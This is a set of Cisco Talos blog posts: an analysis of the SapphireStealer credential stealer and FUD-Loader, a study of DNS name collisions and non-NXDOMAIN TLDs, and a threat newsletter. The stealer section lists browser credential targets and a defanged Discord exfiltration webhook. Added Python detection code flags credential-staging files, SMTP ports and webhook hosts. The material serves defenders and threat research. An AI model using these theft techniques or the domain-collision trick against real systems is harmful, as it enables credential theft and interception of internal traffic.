Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.

SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.

Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.

While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.

SapphireStealer enables simple but effective credential and data theft

SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:

  • Host information.
  • Screenshots.
  • Cached browser credentials.
  • Files stored on the system that match a predefined list of file extensions.

When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:

  • chrome
  • yandex
  • msedge
  • opera

If any matching processes are detected, the malware uses Process.Kill() to terminate them. The code that does this for Google Chrome is shown below.

Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:

  • Chrome
  • Opera
  • Yandex
  • Brave Browser
  • Orbitum Browser
  • Atom Browser
  • Kometa Browser
  • Microsoft Edge
  • Torch Browser
  • Amigo
  • CocCoc
  • Comodo Dragon
  • Epic Privacy Browser
  • Elements Browser
  • CentBrowser
  • 360 Browser

The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:

%TEMP%\sapphire\work

The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.

Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.

The malware creates a new subdirectory called `Files` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:

  • .txt
  • .pdf
  • .doc
  • .docx
  • .xml
  • .img
  • .jpg
  • .png

Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.

This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.

The following host-related information is collected and included in the body of the email message:

  • IP address
  • Hostname
  • Screen resolution
  • OS version and CPU architecture
  • ProcessorId
  • GPU Information

Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.
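The chain just described (browser process termination, staging under %TEMP%\sapphire\work, a log.zip archive, then SMTP or webhook exfiltration) maps directly onto endpoint telemetry. The following is an added detection example written for this post, not Talos or SapphireStealer code: the event schema, the process ids and the SAMPLE_EVENTS are constructed, and the SMTP port list and webhook host strings are assumptions to adapt to your own EDR or Sysmon export.

```python
"""Behaviour-chain detection for the SapphireStealer activity described above.

Added example, not Talos or SapphireStealer code. The event schema (dicts
with a 'type' key) and SAMPLE_EVENTS are constructed for this example.
"""
import re
from collections import defaultdict

# Browser process names the stealer terminates before reading their
# credential stores (from the analysis above).
BROWSER_PROCS = {"chrome", "yandex", "msedge", "opera"}

# Staging directory %TEMP%\sapphire\work and the files written into it.
STAGING_DIR = re.compile(r"\\sapphire\\work\\", re.IGNORECASE)
STAGING_FILES = {"passwords.txt", "screenshot.png", "log.zip"}
SMTP_PORTS = {25, 465, 587}                     # assumption: common submission ports
WEBHOOK_HOSTS = ("discord.com/api/webhooks/", "api.telegram.org/")


def indicators_for_process(events):
    """Return the set of distinct SapphireStealer stages seen for one process."""
    hits = set()
    for ev in events:
        kind = ev["type"]
        if kind == "process_terminate":
            if ev["target_image"].lower() in BROWSER_PROCS:
                hits.add("browser_kill")
        elif kind == "file_create":
            path = ev["path"]
            if STAGING_DIR.search(path):
                name = path.rsplit("\\", 1)[-1].lower()
                if name in STAGING_FILES:
                    hits.add("staging:" + name)
        elif kind == "net_connect":
            if ev.get("dport") in SMTP_PORTS:
                hits.add("exfil:smtp")
            elif any(h in ev.get("url", "") for h in WEBHOOK_HOSTS):
                hits.add("exfil:webhook")
    return hits


def detect_sapphirestealer(events, min_stages=3):
    """Group events by pid; report processes showing >= min_stages stages.

    Requiring several distinct stages (browser kill + staging + exfil)
    keeps a lone log.zip or a lone SMTP connection from firing.
    """
    by_pid = defaultdict(list)
    for ev in events:
        by_pid[ev["pid"]].append(ev)
    findings = {}
    for pid, evs in by_pid.items():
        hits = indicators_for_process(evs)
        if len(hits) >= min_stages:
            findings[pid] = sorted(hits)
    return findings


# Constructed telemetry: pid 4242 behaves like the stealer, pid 1001 is a
# backup tool that merely zips files and talks to a mail relay.
SAMPLE_EVENTS = [
    {"type": "process_terminate", "pid": 4242, "target_image": "chrome"},
    {"type": "file_create", "pid": 4242,
     "path": r"C:\Users\alice\AppData\Local\Temp\sapphire\work\Passwords.txt"},
    {"type": "file_create", "pid": 4242,
     "path": r"C:\Users\alice\AppData\Local\Temp\sapphire\work\Screenshot.png"},
    {"type": "file_create", "pid": 4242,
     "path": r"C:\Users\alice\AppData\Local\Temp\sapphire\work\log.zip"},
    {"type": "net_connect", "pid": 4242, "dhost": "smtp.example.net", "dport": 587},
    {"type": "file_create", "pid": 1001, "path": r"D:\backups\log.zip"},
    {"type": "net_connect", "pid": 1001, "dhost": "relay.example.net", "dport": 25},
]

if __name__ == "__main__":
    for pid, stages in detect_sapphirestealer(SAMPLE_EVENTS).items():
        print(pid, stages)
```

The threshold of three distinct stages is a deliberate choice: a single staging-file write or a single SMTP connection is noisy on its own, but a process that kills a browser, writes Passwords.txt and log.zip under the sapphire\work directory and then opens a mail submission port has little legitimate explanation.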

SapphireStealer extended to support additional exfiltration methods

Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.

In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.

In this case, the Discord webhook URL (SendLog.url) was:

hxxps[:]//discord[.]com/api/webhooks/1123664977618817094/La_3GaXooH42oGRiy8o7sazh1Cg0V_mzkH67VryfSB1MCOlYee1_JPMCNsfOTji7J9jO

In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.

In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.

Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.

FUD-Loader used in multi-stage infections

In several cases, we observed threat actors attempting to leverage a malware downloader called FUD-Loader, which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it has been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.

This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.

In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.

Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.

A case study in operational security (OPSEC) failure

In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:

C:\Users\roman\OneDrive\Рабочий стол\straler\net452\new_game.pdb

This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.

These credentials were also hardcoded into another sample we analyzed.

We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.

D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb

An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.
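PDB paths like the ones above come from the CodeView RSDS record that the linker embeds in a PE file. The following added example (written for this post, not Talos tooling) extracts such records by scanning raw bytes and clusters samples by their PDB directory, which is how a shared build environment, typo included, shows up across samples. The byte blobs, sample names, GUID and the loader.pdb path are constructed; the Sapphire.pdb path is the one quoted above.

```python
"""Pull CodeView RSDS PDB paths out of PE files and cluster samples by them.

Added example, not Talos tooling. SAMPLES holds constructed byte blobs
(a minimal RSDS record behind a fake header, not real PE files); run
extract_pdb_paths over the raw bytes of a real sample to get the same tuples.
"""
import struct
import uuid
from collections import defaultdict

RSDS = b"RSDS"   # CodeView signature, followed by GUID, age, NUL-terminated path


def extract_pdb_paths(data):
    """Return [(guid, age, path)] for every RSDS record found in data.

    Layout: 'RSDS' | 16-byte little-endian GUID | uint32 age | NUL-terminated
    path. Scanning for the signature instead of walking the debug directory
    also catches records left behind in overlays or packed sections.
    """
    found = []
    pos = data.find(RSDS)
    while pos != -1:
        body = pos + 4
        if body + 20 <= len(data):
            guid = uuid.UUID(bytes_le=data[body:body + 16])
            age = struct.unpack_from("<I", data, body + 16)[0]
            end = data.find(b"\x00", body + 20)
            if end == -1:
                end = len(data)
            path = data[body + 20:end].decode("utf-8", errors="replace")
            if path.lower().endswith(".pdb"):
                found.append((str(guid), age, path))
        pos = data.find(RSDS, pos + 4)
    return found


def cluster_by_pdb_dir(samples):
    """{sample_name: bytes} -> {pdb directory (lowercased): [sample names]}.

    Keying on the directory rather than the full path groups samples that
    share a build environment (and its typos) even when the .pdb name changes.
    """
    clusters = defaultdict(list)
    for name, data in samples.items():
        for _guid, _age, path in extract_pdb_paths(data):
            directory = path.rsplit("\\", 1)[0].lower()
            clusters[directory].append(name)
    return dict(clusters)


def make_rsds(path, age, guid):
    """Build a stand-alone RSDS record (constructed test data)."""
    return RSDS + guid.bytes_le + struct.pack("<I", age) + path.encode() + b"\x00"


_GUID = uuid.UUID(int=0x11111111222233334444555555555555)   # constructed
_HDR = b"MZ" + b"\x00" * 62                                 # fake PE header padding

# Constructed samples: a and b share the build directory quoted above,
# c comes from an unrelated (made-up) build tree, d carries no PDB at all.
SAMPLES = {
    "sample_a.exe": _HDR + make_rsds(r"D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb", 3, _GUID),
    "sample_b.exe": _HDR + make_rsds(r"D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb", 5, _GUID),
    "sample_c.exe": _HDR + make_rsds(r"C:\build\other\loader.pdb", 1, _GUID),
    "no_pdb.exe": _HDR,
}

if __name__ == "__main__":
    for directory, names in cluster_by_pdb_dir(SAMPLES).items():
        print(directory, "->", names)
```

On real files the GUID and age pair is what debuggers use to match a binary to its symbol file; for clustering, the path string is usually the more telling artifact because it leaks the developer's username, drive layout and language settings.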

Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.

Two of these three samples were also observed being hosted at the following URL at various times:

In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.

One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 62243-62247.

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

Indicators of Compromise

IOCs for this research can also be found at our GitHub repository here.

What's in a name? Strange behaviors at top-level domains creates uncertainty in DNS

29 August 2023 at 12:00
Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur.

When clicking on a name that ends in “.zip”, are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.

According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013, when ICANN introduced several new TLDs, they also introduced a Name Collision Occurrence Management Framework to deal with the problem.

Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.

Controlled interruption

To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.
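The sentinels only help if someone is actually looking for them in resolver logs. As an added example (not part of the original post), here is how a defender could scan query/response logs for the controlled-interruption name and address and group the colliding internal names by TLD. The log line format, client addresses and names in SAMPLE_LOG are constructed; adjust LOG_RE to the format your resolver actually writes.

```python
"""Spot controlled-interruption sentinels in DNS resolver logs.

Added example, not Talos code. The log format and SAMPLE_LOG lines are
constructed; adapt LOG_RE to your resolver's query/response log.
"""
import re
from collections import defaultdict

# Sentinels prescribed by ICANN's Name Collision Occurrence Management
# Framework (from the text above).
SENTINEL_IP = "127.0.53.53"
SENTINEL_NAME = "your-dns-needs-immediate-attention."

# Constructed log format: one query/response pair per line.
LOG_RE = re.compile(
    r"client=(?P<client>\S+)\s+qname=(?P<qname>\S+)\s+qtype=(?P<qtype>\S+)"
    r"\s+answer=(?P<answer>\S+)"
)


def find_name_collisions(lines):
    """Return {tld: [internal names]} for every query whose answer carries a
    controlled-interruption sentinel.

    A hit means a name that is meant to be internal is being resolved on the
    public internet under a delegated TLD, so fix the search list or suffix
    before the TLD operator (or a registrant there) starts answering for it.
    """
    collisions = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        answer = m["answer"].lower()
        if answer == SENTINEL_IP or SENTINEL_NAME in answer:
            qname = m["qname"].rstrip(".").lower()
            tld = qname.rsplit(".", 1)[-1]
            collisions[tld].add(qname)
    return {tld: sorted(names) for tld, names in collisions.items()}


# Constructed resolver log: two internal names colliding with the .kids TLD,
# one ordinary lookup and one name that correctly returns NXDOMAIN.
SAMPLE_LOG = [
    "2023-08-01T10:00:01Z client=10.0.0.5 qname=intranet.kids. qtype=A answer=127.0.53.53",
    "2023-08-01T10:00:02Z client=10.0.0.5 qname=intranet.kids. qtype=MX "
    "answer=your-dns-needs-immediate-attention.kids.",
    "2023-08-01T10:00:03Z client=10.0.0.8 qname=mail.corp.kids. qtype=A answer=127.0.53.53",
    "2023-08-01T10:00:04Z client=10.0.0.9 qname=www.example.com. qtype=A answer=192.0.2.10",
    "2023-08-01T10:00:05Z client=10.0.0.7 qname=fileshare.corp. qtype=A answer=NXDOMAIN",
]

if __name__ == "__main__":
    for tld, names in find_name_collisions(SAMPLE_LOG).items():
        print(f"collision with .{tld}: {', '.join(names)}")
```

Matching on the MX/SRV/TXT name as well as the A record matters because, as the .kids section below shows, a TLD may stop publishing the 127.0.53.53 address while still returning the sentinel name for other record types.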

The .kids TLD is not alright

One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate-attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.

Hostname lookups on various DNS record types in the .kids TLD.

One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:

    your-dns-needs-immediate-attention.kids

Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”

SCCM requests are issued from various endpoints using a name in .kids.

System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:

“Configuration Manager helps you deliver more effective IT services by enabling:

  • Secure and scalable deployment of applications, software updates, and operating systems.
  • Real-time actions on managed devices.
  • Cloud-powered analytics and management for on-premises and internet-based devices.
  • Compliance settings management.
  • Comprehensive management of servers, desktops, and laptops.”

Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.

Systems attempting to relay email through Talos to various email addresses @kids.

Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.

Zombified DNS names

Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.

Typically, when a domain name is not actively registered, a DNS query for that name will generate the response ‘NXDOMAIN’, which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.

.ws ccTLD — Western Samoa

The .ws country-code TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an `NXDOMAIN` response. Rather, the .ws TLD continues to hand out an IP address and MX server:

The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.

.vg ccTLD — The Virgin Islands

The .vg country-code TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.

On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.

In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:

Unsuccessfully attempting to send mail to the implicit MX offered by .vg.

.ph ccTLD — The Philippines

The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45[.]79[.]222[.]138.

Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.

Second-level “TLDs”

Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”

Queries for expired/non-existent domains at com.de return both an IP address and a mail server.

Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.

Unsuccessfully attempting to send mail to the MX offered by .com.de.

A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”

When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:

MX records for the .us.org domain.

The DNS records at us.org are set up in an interesting way. Although MX records are returned for our non-existent domain name, looking carefully at them shows that the most-preferred MX (preference 0) is simply a dot [.]. This is a NULL MX setting, and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may fall back to one of the less-preferred MX records and connect to googlemail.com to attempt email delivery.
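To make the implicit-MX and NULL MX behaviour from the last few sections concrete, here is an added example (not Talos code) of the decision a mail transfer agent makes given a domain's MX and A records, with the correct behaviour beside the sloppy one the text warns about. The record sets in CASES are constructed to mirror the .ws, .vg and us.org behaviours above; the IP addresses and the mx.googlemail.com exchange name are placeholders.

```python
"""Where should an MTA deliver mail for a domain?

Worked example added here, not Talos code. It implements the RFC 5321
implicit-MX rule and the NULL MX convention (RFC 7505). CASES is constructed
to mirror the TLD behaviours described above; IPs and the googlemail
exchange name are placeholders.
"""

NXDOMAIN = None   # sentinel: the name does not exist at all


def well_behaved_targets(domain, mx_records, a_records):
    """Return delivery targets in order of preference.

    mx_records: list of (preference, exchange) as returned by DNS.
    a_records:  list of IP strings for the domain name itself.
    []   means "this domain accepts no mail" (NULL MX).
    None means the name does not exist (NXDOMAIN): nothing to try.
    """
    if mx_records:
        ordered = sorted(mx_records, key=lambda r: r[0])
        best = ordered[0][0]
        # NULL MX: a "." exchange at the most-preferred level means
        # no mail service. Do NOT fall back to the other exchanges.
        if any(ex.strip(".") == "" for pref, ex in ordered if pref == best):
            return []
        return [ex.rstrip(".") for _, ex in ordered if ex.strip(".") != ""]
    if a_records:
        # RFC 5321 section 5.1: no MX at all -> implicit MX with preference 0
        # pointing at the domain's own address. This is why a TLD that hands
        # out an A record for unregistered names still attracts delivery attempts.
        return [domain]
    return NXDOMAIN


def poorly_behaved_targets(domain, mx_records, a_records):
    """The mistake described above: drop the "." entry and keep trying."""
    if mx_records:
        ordered = sorted(mx_records, key=lambda r: r[0])
        return [ex.rstrip(".") for _, ex in ordered if ex.strip(".") != ""]
    return [domain] if a_records else NXDOMAIN


# Constructed DNS answers modelled on the TLD behaviours in the text.
CASES = {
    "expired.ws":     ([(10, "mail.hope-mail.com.")], ["192.0.2.10"]),
    "expired.vg":     ([], ["192.0.2.20"]),                            # A only, no MX
    "expired.us.org": ([(0, "."), (10, "mx.googlemail.com.")], ["192.0.2.30"]),
    "gone.example":   ([], []),                                        # true NXDOMAIN
}

if __name__ == "__main__":
    for name, (mx, a) in CASES.items():
        print(f"{name:16} good={well_behaved_targets(name, mx, a)} "
              f"sloppy={poorly_behaved_targets(name, mx, a)}")
```

The two functions differ only in how they treat the "." exchange, yet that single branch is the difference between a bounce and handing an unregistered domain's mail to whoever operates the fallback exchange.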

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

24 August 2023 at 18:00
Welcome to this week’s edition of the Threat Source newsletter.

I have no idea how “Fortnite” keeps coming up in this newsletter, but here we are again.

Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.

After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.

Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.

These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.

This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.

For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.

The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the suspiciously named “EPic Games,” which reeks of the same vibes as a typosquatted domain.

Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.

I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.

But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.

The one big thing

The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.

Why do I care?

Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. This specific set of RATs is smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.

So now what?

Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.

Top security headlines of the week

The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists. The Lazarus Group reportedly holds a combined 1,580 Bitcoin across six separate crypto wallets, which the FBI tracked over a 24-hour period earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency companies could examine their blockchain data and "be vigilant in guarding against transactions directly with, or derived from the addresses." (TechCrunch, SecurityWeek)

A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia. Security researchers attributed the attack to a new actor known as "Carderbee" that is currently not tied to any state affiliations. The attackers abused the legitimate Cobra DocGuard software, made by a Chinese software company, to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (also known as PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)

The Clop threat actor was responsible for more than a third of all ransomware attacks in July, according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation offering a detailed account and timeline of a mercenary spyware organization, from almost bankrupt to having fully working spyware targeting iOS and Android with a one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

